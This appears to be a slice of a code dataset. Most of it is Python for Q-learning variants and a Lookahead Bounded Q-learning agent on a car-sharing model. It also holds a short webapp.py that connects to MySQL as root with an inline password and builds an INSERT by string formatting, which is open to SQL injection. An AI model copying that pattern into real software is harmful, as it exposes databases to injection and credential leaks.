[]\n self.rel_er_times = []\n \n self.most_visited_sa =[]\n\n\n def find_indices(self, indices):\n if len(indices.shape)==1:\n return bisect.bisect_left(self.env.states_list, tuple(indices.tolist()))\n elif len(indices) > 100:\n # Faster to generate all indices when we have a large\n # number to check\n return get_idx(indices)\n else:\n return [bisect.bisect_left(self.env.states_list, tuple(i)) for i in indices.tolist()]\n\n\n def epsilon_greedy_policy(self, q_values,state_idx, force_epsilon=None):\n '''Creates epsilon greedy probabilities to actions sample from.\n Uses state visit counts.\n ''' \n eps = None\n if force_epsilon:\n eps = force_epsilon\n else:\n # Decay epsilon, save and use\n d = np.sum(self.count[state_idx,:]) if np.sum(self.count[state_idx,:]) else 1 \n eps = 1./d**self.eps_greedy_par\n self.epsilon = eps\n if self.prng.rand() < eps:\n action_idx = self.prng.choice(self.env.nA,1)[0]\n action = self.env.actions[action_idx]\n else:\n action_idx = np.argmax(q_values)\n action = self.env.actions[action_idx]\n return action, action_idx \n\n def greedy_policy(self, q_values):\n '''Creating greedy policy to get actions from'''\n action_idx = np.argmax(q_values)\n action = self.env.actions[action_idx]\n return action, action_idx\n\n def lr_func(self,n):\n \"\"\" Implements a polynomial learning rate of the form (1/n**w)\n n: Integer\n The iteration number\n w: float between (0.5, 1]\n Returns 1./n**w as the rate\n \"\"\"\n assert n > 0, \"Make sure the number of times a state action pair has been observed is always greater than 0 before calling polynomial_learning_rate\"\n \n return 1./n**self.polynomial_lr\n\n def initialize_plot(self, Title, xlabel, ylabel):\n ''' \n Initialize interactive plots that shows how L, Q, U and Q-learning\n values for selected (s,a)'s are changing after each step.\n '''\n plt.ion() \n self.fig, self.axes = plt.subplots(nrows=3, ncols=1, figsize=(10,10))\n self.fig.text(0.5, 0.01, xlabel, ha='center')\n self.fig.text(0.005, 0.5, ylabel, va='center', rotation='vertical')\n self.fig.show()\n self.fig.canvas.draw()\n plt.tight_layout()\n \n self.fig.suptitle(Title, size=12) #In python 2.7 it is fontsize instead of size\n self.fig.subplots_adjust(top=0.95)\n \n self.fig.subplots_adjust(hspace=0, wspace=0) \n \n def plot_on_running(self, to_plot, Labels, step):\n ''' \n Call interactive plots that shows how L, Q, U and Q-learning\n values for selected (s,a)'s are changing after each step.\n '''\n a, b, c = to_plot.shape\n for i, ax in enumerate(self.axes):\n ax.clear()\n for j in range(b): \n ax.plot(to_plot[i][j], label=Labels[i][j])\n plt.setp(ax.get_xticklabels(), visible=True)\n ax.grid()\n ax.legend(loc='best') \n plt.setp(self.axes[2].get_xticklabels(), visible=True)\n self.fig.canvas.draw() # draw\n plt.pause(0.000000000000000001) \n \n\n \n def train(self, interactive_plot = False, verbose = False):\n ''' Trains the Q-learning agent'''\n start_time = timeit.default_timer()\n \n \n #interactive plot: initialise the graph and settings\n self.Q_list.append(np.copy(self.Q))\n if interactive_plot:\n self.initialize_plot('Standard Q-learning', 'Time steps','Action-value')\n Labels = np.array([['Q-learning['+str(self.sa1)+']'],\n ['Q-learning['+str(self.sa2)+']'],\n ['Q-learning['+str(self.sa3)+']']])\n \n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :]\n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n self.most_visited_sa.append((state_idx,action_idx))\n \n self.count[state_idx, action_idx] += 1 \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n # Q-Learning update\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :])\\\n - self.Q[state_idx, action_idx])\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n state = newState\n state_idx = newState_idx\n \n if interactive_plot:\n #print new Action-values after every step\n self.SQLsa_1.append(self.Q[self.sa1])\n self.SQLsa_2.append(self.Q[self.sa2])\n self.SQLsa_3.append(self.Q[self.sa3]) \n self.Q_list.append(np.copy(self.Q))\n if step % 10000 == 0:\n to_plot =np.array([[self.SQLsa_1], [self.SQLsa_2], [self.SQLsa_3]])\n self.plot_on_running(to_plot, Labels, step)\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print('Time=',elapsed_time)\n return self.Q_list, elapsed_time\n\n##############################################################################\n \n# SARSA\n\n##############################################################################\n\nclass SARSA(Qlearning):\n \"\"\"\n SARSA algorithm.\n \"\"\"\n def __init__(self, ENV, SEED):\n super(SARSA, self).__init__(ENV, SEED)\n\n def train(self, verbose = False):\n start_time = timeit.default_timer()\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state\n state = self.env.reset()\n \n for step in range(self.num_steps):\n \n \n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state, :]\n action, action_idx = self.epsilon_greedy_policy(q_values)\n self.count[state, action_idx] += 1 \n # execute action\n newState, reward, info = self.env.step(action)\n self.lr = self.lr_func(self.count[state, action_idx]) \n # SARSA update\n self.Q[state, action_idx] += self.lr *(reward + self.gamma* self.Q[newState, action_idx]\\\n - self.Q[state, action_idx])\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state, ) \n \n state = newState\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time\n \n##############################################################################\n \n# Speedy Q-Learning\n\n##############################################################################\n \nclass SpeedyQLearning(Qlearning):\n \"\"\"\n Speedy Q-Learning algorithm.\n \"Speedy Q-Learning\". Ghavamzadeh et. al.. 2011.\n \"\"\"\n def __init__(self, ENV, SEED,):\n super(SpeedyQLearning, self).__init__(ENV, SEED,)\n self.Q_old = np.copy(self.Q)\n \n def train(self, verbose= False):\n ''' Trains the Q-learning agent'''\n start_time = timeit.default_timer()\n\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n old_q = np.copy(self.Q)\n \n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :]\n action, action_idx = self.epsilon_greedy_policy(q_values,state_idx)\n self.count[state_idx, action_idx] += 1 \n # execute action\n next_state, reward, info = self.env.step(action)\n next_state_idx = self.find_indices(next_state)\n max_q_cur = np.max(self.Q[next_state_idx, :]) \n max_q_old = np.max(self.Q_old[next_state_idx, :]) \n \n target_cur = reward + self.gamma * max_q_cur\n target_old = reward + self.gamma * max_q_old\n \n# alpha = 1/ (self.count[state, action_idx] + 1)\n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n alpha = self.lr \n q_cur = self.Q[state_idx, action_idx]\n \n self.Q[state_idx, action_idx] = q_cur + alpha * (target_old - q_cur) + (\n 1. - alpha) * (target_cur - target_old)\n\n self.Q_old = np.copy(old_q)\n \n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n \n state = next_state\n state_idx = next_state_idx\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time \n\n##############################################################################\n \n# Double Q-Learning\n\n############################################################################## \n \nclass DoubleQLearning(Qlearning):\n \"\"\"\n Double Q-Learning algorithm.\n \"Double Q-Learning\". Hasselt H. V.. 2010.\n \"\"\"\n def __init__(self, ENV, SEED):\n super(DoubleQLearning, self).__init__(ENV, SEED)\n self.Qprime = np.copy(self.Q)\n self.countprime = np.copy(self.count)\n\n \n def train(self, verbose=False):\n ''' Trains the Q-learning agent'''\n start_time = timeit.default_timer()\n\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n # choose an action based on epsilon-greedy policy\n q_values = (self.Q[state_idx, :] + self.Qprime[state_idx, :] )/2\n action, action_idx = self.epsilon_greedy_policy(q_values,state_idx)\n \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState) \n \n # Double Q-Learning update\n \n if np.random.uniform() < .5:\n self.count[state_idx, action_idx] += 1 \n self.lr = self.lr_func(self.count[state_idx, action_idx])\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Qprime[newState_idx, :])\\\n - self.Q[state_idx, action_idx])\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append((np.copy(self.Q)+np.copy(self.Qprime))/2)\n \n else:\n self.countprime[state_idx, action_idx] += 1 \n self.lr = self.lr_func(self.countprime[state_idx, action_idx])\n self.Qprime[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :])\\\n - self.Qprime[state_idx, action_idx])\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append((np.copy(self.Qprime)+np.copy(self.Q))/2)\n \n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n\n state = newState\n state_idx = newState_idx\n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time\n\n##############################################################################\n \n# Bias Corrected Q-leaning\n\n############################################################################## \n\nclass Bias_corrected_QL(Qlearning):\n '''Implementation of a Bias Corrected Q-leaning Agent '''\n \n def __init__(self, ENV, SEED, K = 20):\n super(Bias_corrected_QL, self).__init__(ENV, SEED)\n self.K = K\n self.BR = np.zeros((self.env.nS, self.env.nA))\n self.BT = np.zeros((self.env.nS, self.env.nA))\n self.Rvar = np.zeros((self.env.nS, self.env.nA)) \n self.Rmean = np.zeros((self.env.nS, self.env.nA)) \n self.n_actions = self.env.actions.shape[0] \n self.count = np.ones((self.env.nS, self.env.nA)) \n self.T = np.zeros((self.env.nS, self.env.nA, self.K)).astype(int) \n #self.n_eps = np.zeros(self.env.nS)\n \n \n def train(self, verbose = False):\n start_time = timeit.default_timer()\n self.Q_list.append(np.copy(self.Q))\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :] #+ self.U[state, :] - self.L[state,:] \n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n \n self.lr = self.lr_func(self.count[state_idx, action_idx]) #1000/(1000+step)\n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n self.T[state_idx,action_idx, :-1] = self.T[state_idx,action_idx, 1:]\n self.T[state_idx,action_idx, -1] = int(newState_idx)\n #self.memory.append((state, action_idx,reward))\n \n prevMean = self.Rmean[state_idx, action_idx]\n prevVar = self.Rvar[state_idx, action_idx]\n prevSigma = np.sqrt(prevVar/self.count[state_idx, action_idx])\n \n self.Rmean[state_idx, action_idx] = prevMean + (reward - prevMean)/self.count[state_idx, action_idx]\n self.Rvar[state_idx, action_idx] = (prevVar + (reward- prevMean)*(reward - self.Rmean[state_idx, action_idx]))/self.count[state_idx, action_idx]\n \n bM= np.sqrt(2*np.log(self.n_actions +7) - np.log(np.log(self.n_actions + 7)) - np.log(4*np.pi))\n self.BR[state_idx, action_idx]=(np.euler_gamma/bM + bM)*prevSigma\n self.BT[state_idx, action_idx]=self.gamma *(np.max(self.Q[newState_idx,:]) - np.mean(np.max(self.Q[self.T[state_idx,action_idx],:],axis=1)))\n delta = self.Rmean[state_idx, action_idx] + self.gamma * np.max(self.Q[newState_idx, :]) - self.Q[state_idx, action_idx]\n self.BR[state_idx, action_idx] = self.BR[state_idx, action_idx] if self.count[state_idx, action_idx] >=2 else 0.0\n self.BT[state_idx, action_idx] = self.BT[state_idx, action_idx] if self.count[state_idx, action_idx] >=self.K else 0.0\n \n self.Q[state_idx, action_idx] += self.lr * (delta -self.BR[state_idx, action_idx] - self.BT[state_idx, action_idx])\n\n \n self.count[state_idx, action_idx] += 1 \n state = newState\n state_idx = newState_idx\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n \n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n\n elapsed_time = timeit.default_timer() - start_time\n print(\"Time=\"+str(elapsed_time))\n return self.Q_list, elapsed_time \n\n##############################################################################\n \n# Lookahead Bounded Q-Learning\n\n############################################################################## \n\n \nclass Replay_Memory():\n\n def __init__(self, burn_in, memory_size=40, SEED=678, GAMMA= 0.95, K= 20 ):\n # The memory essentially stores transitions recorded from the agent\n \n self.memory = collections.deque(maxlen=memory_size)\n self.burn_in = burn_in\n self.prng_simulator = np.random.RandomState(SEED)\n random.seed(SEED)\n self.gamma = GAMMA\n self.K = K\n \n def ref_freq(self):\n# v=np.array(np.unique(self.memory, return_counts=True)).T.astype(float)\n v,i=np.unique(self.memory, return_counts=True, axis=0)\n# s=np.array(list(zip(v,i)))\n# s[:,1]= s[:,1]/len(self.memory)\n i=i/len(self.memory)\n return v,i\n \n \n def simulate_sample_path(self):\n '''TODO'''\n tau = self.prng_simulator.geometric(p=1-self.gamma, size=1)[0] \n #sample_path = random.sample(self.memory, tau) # no replacement\n sample_path = random.choices(self.memory, k=tau) # with replacement\n# eps, dist = self.ref_freq()\n return np.array(sample_path)\n \n def sample(self):\n '''TODO'''\n sample = random.choices(self.memory, k=self.K) \n return np.array(sample)\n \n def append(self, transition):\n # Appends transition to the memory. \n self.memory.append(transition)\n \n def multi_append(self, *args):\n n = len(args)\n # Appends transition to the memory.\n for i in range(n):\n self.memory.append(args[i])\n\ndef bc(N,k):\n# return np.round(comb(N,k)).astype(int)\n return np.round(binom(N,k)).astype(int)\n\n\ndef get_idx(s):\n N = np.arange(1,s.shape[-1])\n ps = s[...,::-1].cumsum(-1)\n return (bc(ps[...,1:]+N,N) - bc(ps[...,:-1]+N,N)).sum(-1)\n \ndef reduce_cumulative(a, i, j, ufunc=np.add, axis=2):\n i = (a.shape[axis] + i) % a.shape[axis]\n j = (a.shape[axis] + j) % a.shape[axis]\n a = np.insert(a, 0, 0, axis)\n c = ufunc.accumulate(a, axis=axis)\n pre = np.ix_(*(range(x) for x in i.shape))\n l = len(i.shape) - axis\n return c[pre[l:] + (j,)] - c[pre[l:] + (i,)]\n\ndef sliced_reduce(a, i, j, ufunc=np.add, axis=2):\n indices = np.tile(\n np.repeat(\n np.arange(np.prod(a.shape[:axis])) * a.shape[axis],\n 2\n ),\n np.prod(i.shape[:len(i.shape) - axis])\n )\n indices[::2] += (a.shape[axis] + i.ravel()) % a.shape[axis]\n indices[1::2] += (a.shape[axis] + j.ravel()) % a.shape[axis]\n indices = indices.reshape(-1, 2)[::-1].ravel() # This seems to be counter-effective, please check for your own case.\n result = ufunc.reduceat(a.reshape(-1, *a.shape[axis+1:]), indices)[::2] # Select only even to odd.\n result[indices[::2] == indices[1::2]] = ufunc.reduce([])\n return result[::-1].reshape(*(i.shape + a.shape[axis+1:]))\n\ndef sliced_sum_numba(a, i, j, axis=2):\n i = (a.shape[axis] + i) % a.shape[axis]\n j = (a.shape[axis] + j) % a.shape[axis]\n m = np.prod(i.shape[:len(i.shape) - axis], dtype=int)\n n = np.prod(i.shape[len(i.shape) - axis:], dtype=int)\n a_flat = a.reshape(-1, *a.shape[axis:])\n i_flat = i.ravel()\n j_flat = j.ravel()\n result = np.empty((m*n,) + a.shape[axis+1:], dtype=a.dtype)\n numba_sum(a_flat, i_flat, j_flat, m, n, result)\n return result.reshape(*(i.shape + a.shape[axis+1:]))\n\n@numba.jit(parallel=True, nopython=True)\ndef numba_sum(a, i, j, m, n, out):\n for index in numba.prange(m*n):\n out[index] = np.sum(a[index % n, i[index]:j[index]], axis=0)\n\n\n@jit(nopython=True, cache=True)\ndef comp(sample_path_eps,sample_path_B,nS, nA, Qp, QG, QL, EmaxQ_array, \n mean_reward_array, next_states_indx):\n for t in range(len(sample_path_eps) - 1, -1, -1):\n for s_idx in range(nS):\n for a_idx in range(nA):\n ns_idx = next_states_indx[s_idx,a_idx, t]\n a_id = np.argmax(Qp[ns_idx, :])\n EmaxQa = EmaxQ_array[s_idx, a_idx] \n reward = mean_reward_array[s_idx, a_idx]\n a_QG_id = np.argmax(QG[t+1, ns_idx, :])\n \n QG[t, s_idx, a_idx] = reward + QG[t+1, ns_idx, a_QG_id ] + EmaxQa - Qp[ ns_idx, a_id] \n QL[t, s_idx, a_idx] = reward + QL[t+1, ns_idx, a_id ] + EmaxQa - Qp[ ns_idx, a_id] \n return QG, QL \n\ndef solve_inner_DP(sample_path_eps,sample_path_B,\n env, Q, EmaxQ_array, mean_reward_array,\n next_states_indx): \n '''\n Solves the deterministic perfect information relaxation problem via backward induction \n ''' \n nS = env.nS\n nA = env.nA\n tau = len(sample_path_eps) \n QG = np.zeros((tau + 1, nS, nA))\n QG[tau, :, :] = np.copy(Q)\n QL = np.zeros((tau + 1, nS, nA))\n QL[tau, :, :] = np.copy(Q)\n \n return comp(sample_path_eps,sample_path_B,nS, nA, Q, QG, QL, EmaxQ_array, \n mean_reward_array, next_states_indx)\n \nclass LBQL(Qlearning):\n '''Implementation of a LBQL Agent '''\n \n def __init__(self, ENV, \n SEED,\n L_LR=0.01, \n U_LR=0.01,\n WITH_PENALTY=True,\n BURN_IN = 1000,\n USE_K = False,\n K = 20,\n memory_size=100000,\n M =200,\n relTol=0.01,\n USE_SCHEDULE = False\n ):\n super(LBQL, self).__init__(ENV, SEED,)\n self.L_lr = L_LR\n L_LR_SCHEDULE = np.ones(self.num_steps)\n L_LR_SCHEDULE[0:round(self.num_steps/2)] *= 0.1\n L_LR_SCHEDULE[round(self.num_steps/2):self.num_steps] *= 0.01\n self.L_lr_schedule = L_LR_SCHEDULE\n \n self.U_lr = U_LR\n U_LR_SCHEDULE = np.ones(self.num_steps)\n U_LR_SCHEDULE[0:round(self.num_steps/2)] *= 0.1\n U_LR_SCHEDULE[round(self.num_steps/2):self.num_steps] *= 0.01\n self.U_lr_schedule = U_LR_SCHEDULE\n\n self.L = np.ones((self.env.nS, self.env.nA)) * self.Lzero/(1-self.gamma)\n self.U = np.ones((self.env.nS, self.env.nA)) * self.Uzero/(1-self.gamma)\n\n self.USE_K = USE_K\n self.K = K\n self.M = M\n self.relTol = relTol\n self.with_penalty = WITH_PENALTY\n self.s_a_tuples = list(itertools.product(range(self.env.nS), range(self.env.nA)))\n self.burn_in = BURN_IN\n self.memory_eps = Replay_Memory(self.burn_in, memory_size= memory_size, SEED= SEED,\n GAMMA= self.gamma, K=self.K)\n self.memory_B = Replay_Memory(self.burn_in, memory_size= memory_size, SEED= SEED,\n GAMMA= self.gamma, K=self.K)\n ###### for plotting/monitoring L, Q and U\n self.Q_learning = np.copy(self.Q)\n self.Lsa_1 = []\n self.Qsa_1 = []\n self.Usa_1 = []\n self.QLsa_1 = []\n self.Lsa_2 = []\n self.Qsa_2 = []\n self.Usa_2 = [] \n self.QLsa_2 = []\n self.Lsa_3 = []\n self.Qsa_3 = []\n self.Usa_3 = [] \n self.QLsa_3 = []\n \n self.Q_list = []\n self.QL_list = []\n self.L_list = []\n self.U_list = []\n self.Rmean = np.zeros((self.env.nS, self.env.nA)) \n self.prevMean = np.zeros((self.env.nS, self.env.nA)) \n self.num_called_DP = 0\n \n self.USE_SCHEDULE = USE_SCHEDULE\n def solve_QG_QL_DP(self, sample_path_eps,sample_path_B):\n ''' Computes the upper & lower bounds on the Q-values by solving the PI \n and PI with nonanticipative policy problems, respectively via backward induction'''\n self.num_called_DP += 1\n tau = len(sample_path_eps) \n self.QG = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.QG[tau, :, :] = np.copy(self.Q)\n self.QL = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.QL[tau, :, :] = np.copy(self.Q)\n self.QD = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.backward_induction(sample_path_eps,sample_path_B)\n \n \n def f_r(self,sample_eps, sample_B):\n d_plus_eps = self.env.actions[:,None] + sample_eps\n w=np.minimum(self.env.states[:,None,None,:], d_plus_eps).astype(int)\n wij = reduce_cumulative(sample_B, np.zeros_like(w),w, np.add, axis=2)\n next_states = self.env.states[:,None,None,:] + np.sum(wij,axis=-2) - w\n next_states = next_states.astype(int)\n next_states_indx=get_idx(next_states)\n num_lost_sales = d_plus_eps - w\n dwij=np.multiply(self.env.stations.distance_ij, wij)\n lost_sales_cost = num_lost_sales@ self.env.stations.lost_sales_cost\n profit = np.sum(self.env.price[:,None,:,None] *dwij, axis=(3,4))\n reward = profit - lost_sales_cost\n mean_reward = np.mean(reward, axis=2)\n return next_states, next_states_indx, mean_reward \n \n \n def f_d(self,sample_eps, sample_B):\n d_plus_eps = self.env.actions[:,None] + sample_eps\n w=np.minimum(self.env.states[:,None,None,:], d_plus_eps).astype(int)\n wij = reduce_cumulative(sample_B, np.zeros_like(w),w, np.add, axis=2)\n next_states = self.env.states[:,None,None,:] + np.sum(wij,axis=-2) - w\n next_states = next_states.astype(int)\n next_states_indx=get_idx(next_states)\n return next_states, next_states_indx \n \n def Average_EmaxQa(self):#\n ''' Computes an estimated expected value using simulation ''' \n dim_s = self.sample_eps.shape[0]\n p = 1/dim_s*np.ones(dim_s)\n next_states, next_states_indx, mean_reward = self.f_r( self.sample_eps, self.sample_B)\n EmaxQa=np.dot(np.max(self.Q[next_states_indx, :],axis=3), p) #.reshape((self.env.nS,self.env.nA,dim_s))\n self.prevMean = self.Rmean\n self.Rmean = self.prevMean + (mean_reward - self.prevMean)/self.num_called_DP\n\n return self.gamma*EmaxQa, self.Rmean,next_states, next_states_indx \n \n \n def backward_induction(self, sample_path_eps,sample_path_B): \n '''\n Solves the deterministic perfect information relaxation problem via backward induction \n ''' \n if self.USE_K == False:\n EmaxQ_array, mean_reward_array,next_states, next_states_indx = self.Average_EmaxQa()\n else:\n EmaxQ_array, mean_reward_array,next_states, next_states_idx = self.Average_EmaxQa()\n next_states, next_states_indx = self.f_d(sample_path_eps, sample_path_B)\n self.QG, self.QL = solve_inner_DP(sample_path_eps,sample_path_B, \n self.env, self.Q, EmaxQ_array, \n mean_reward_array,\n next_states_indx)\n \n \n \n def train(self, interactive_plot = False, verbose = True):\n ''' Trains the Q-learning with IR agent'''\n \n start_time = timeit.default_timer()\n \n if interactive_plot:\n #interactive plot: initialise the graph and settings\n Title = 'Q-learning with penalty' if self.with_penalty else 'Q-learning no penalty'\n self.initialize_plot(Title, 'Time steps','Action-value')\n Labels = np.array([['L['+str(self.sa1)+']', 'Q['+str(self.sa1)+']','U['+str(self.sa1)+']','Q-learning['+str(self.sa1)+']'],\n ['L['+str(self.sa2)+']', 'Q['+str(self.sa2)+']','U['+str(self.sa2)+']','Q-learning['+str(self.sa2)+']'],\n ['L['+str(self.sa3)+']', 'Q['+str(self.sa3)+']','U['+str(self.sa3)+']','Q-learning['+str(self.sa3)+']']])\n \n self.L_list.append(np.copy(self.L))\n self.U_list.append(np.copy(self.U))\n self.Q_list.append(np.copy(self.Q)) \n \n self.QL_list.append(np.copy(self.Q_learning))\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n \n for step in range(self.num_steps):\n\n if self.USE_SCHEDULE:\n self.U_lr= self.U_lr_schedule[step]\n self.L_lr= self.L_lr_schedule[step]\n\n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :] \n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n self.most_visited_sa.append((state_idx,action_idx))\n \n self.count[state_idx, action_idx] += 1\n \n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n \n self.memory_eps.append(info['noise']['epsilons'])\n self.memory_B.append(info['noise']['B'])\n # Q-Learning update\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :]) -\\\n self.Q[state_idx, action_idx])\n if interactive_plot:\n # Standard Q-Learning following same behavioral policy\n self.Q_learning[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q_learning[newState_idx, :]) -\\\n self.Q_learning[state_idx, action_idx])\n cond = (step % self.M ==0 and step >= self.burn_in) and \\\n (not np.isclose(self.L[state_idx, action_idx],self.U[state_idx, action_idx],self.relTol) or \\\n not self.L[state_idx, action_idx]<=self.Q[state_idx, action_idx] <=self.U[state_idx, action_idx])\n if cond:# \n \n sample_path_eps = self.memory_eps.simulate_sample_path()\n sample_path_B = self.memory_B.simulate_sample_path()\n assert len(sample_path_eps)==len(sample_path_B)\n if self.USE_K:\n self.sample_eps = self.memory_eps.sample()\n self.sample_B = self.memory_B.sample()\n else:\n self.sample_eps = sample_path_eps\n self.sample_B = sample_path_B\n \n time =timeit.default_timer()\n self.solve_QG_QL_DP(sample_path_eps, sample_path_B) \n if self.with_penalty: \n self.U += self.U_lr * (self.QG[0,:, :] - self.U)\n \n else:\n self.U += self.U_lr * (self.QD[0,:, :] - self.U)\n \n self.L += self.L_lr * (self.QL[0,:, :] - self.L)\n\n self.Q[state_idx, action_idx] = np.maximum(np.minimum(self.U[state_idx, action_idx],\\\n self.Q[state_idx, action_idx]),self.L[state_idx, action_idx])\n \n state = newState\n state_idx = newState_idx\n \n if interactive_plot:\n #print new Action-values after every 10000 step \n self.Lsa_1.append(self.L[self.sa1])\n self.Qsa_1.append(self.Q[self.sa1])\n self.Usa_1.append(self.U[self.sa1]) \n self.QLsa_1.append(self.Q_learning[self.sa1])\n self.Lsa_2.append(self.L[self.sa2])\n self.Qsa_2.append(self.Q[self.sa2])\n self.Usa_2.append(self.U[self.sa2]) \n self.QLsa_2.append(self.Q_learning[self.sa2])\n self.Lsa_3.append(self.L[self.sa3])\n self.Qsa_3.append(self.Q[self.sa3])\n self.Usa_3.append(self.U[self.sa3]) \n self.QLsa_3.append(self.Q_learning[self.sa3])\n \n \n # self.L_list.append(np.copy(self.L))\n # self.U_list.append(np.copy(self.U))\n \n if step % 10000 == 0:\n to_plot =np.array([[self.Lsa_1, self.Qsa_1, self.Usa_1, self.QLsa_1],\n [self.Lsa_2, self.Qsa_2, self.Usa_2, self.QLsa_2],\n [self.Lsa_3, self.Qsa_3, self.Usa_3, self.QLsa_3]])\n self.plot_on_running(to_plot, Labels, step)\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n # self.QL_list.append(np.copy(self.Q_learning))\n\n elapsed_time = timeit.default_timer() - start_time\n print(\"Time=\"+str(elapsed_time))\n print(elapsed_time)\n return self.Q_list, self.QL_list, elapsed_time \nif __name__=='__main__':\n env = CarSharN() \n env.reset()\n agent = LBQL(env,1)\n q, ql,et =agent.train(interactive_plot= True)\n from collections import Counter\n Output = Counter(agent.most_visited_sa)\n Output.most_common(50)\n from matplotlib import rcParams\n import seaborn as sns\n\n############################################################################## \n sns.set(style=\"darkgrid\")\n sns.set(font_scale=1.75)\n\n fig, ax = plt.subplots(1,1)\n length= len(agent.Lsa_2)\n #lbl=np.arange(0,length/1000,1).astype(int)\n lbl=[0,0,200,400]#np.arange(0,20000/1000+1,5)\n plt.plot(agent.Lsa_2, label='LBQL-L', lw=2, alpha=0.8)\n plt.plot(agent.Qsa_2, label='LBQL-Q\\'', lw=5, alpha=0.8)\n plt.plot(agent.Usa_2, label='LBQL-U',lw=2, alpha=0.8)\n plt.plot(agent.QLsa_2,color='k', label='QL-Q',lw=2, linestyle='-', alpha=0.8)\n plt.legend(loc='best', fontsize=15)#13.3)\n# plt.tight_layout()\n plt.xlabel('Number of steps x 1000')\n plt.ylabel('Action-value')\n ax.set_xticklabels(lbl)","sub_path":"src/4-CS/agents_N.py","file_name":"agents_N.py","file_ext":"py","file_size_in_byte":37451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395363008","text":"#!usr/bin/Python\nimport sys\nimport MySQLdb\nfrom nums import get_id\nimport json\n\nconn = MySQLdb.connect('localhost', 'root', 'shortfuse', 'm_leads')\ncursor = conn.cursor()\nclass Lead():\n\t\"\"\"docstring for lead\"\"\"\n\tdef __init__(self):\n\t\tself.st = True\n\n\tdef load(self, x_dict): #The\n\t#Send the data into MySQL\n\t\tquery = 'INSERT INTO leads VALUES(\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",NOW())' % (x_dict['id'],\n\t\tx_dict['name'],x_dict['email'],x_dict['num'],x_dict['cmpn'],x_dict['note'] )\n\t\ttry:\n\t\t\tcursor.execute(query)\n\t\t\tfinal = json.dumps({'Status' : 'Success', 'ref' : x_dict['id'] })\n\t\t\tconn.commit()\n\t\texcept:\n\t\t\tfinal = json.dumps({'Status' : 'Failed. Try', 'ref' : None})\n\t\t\t\n\t\tdel query\n\t\treturn final\n\n\n\n\t# def retrieve(self, account)","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349682087","text":"import numpy as np\nfrom netCDF4 import Dataset\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as 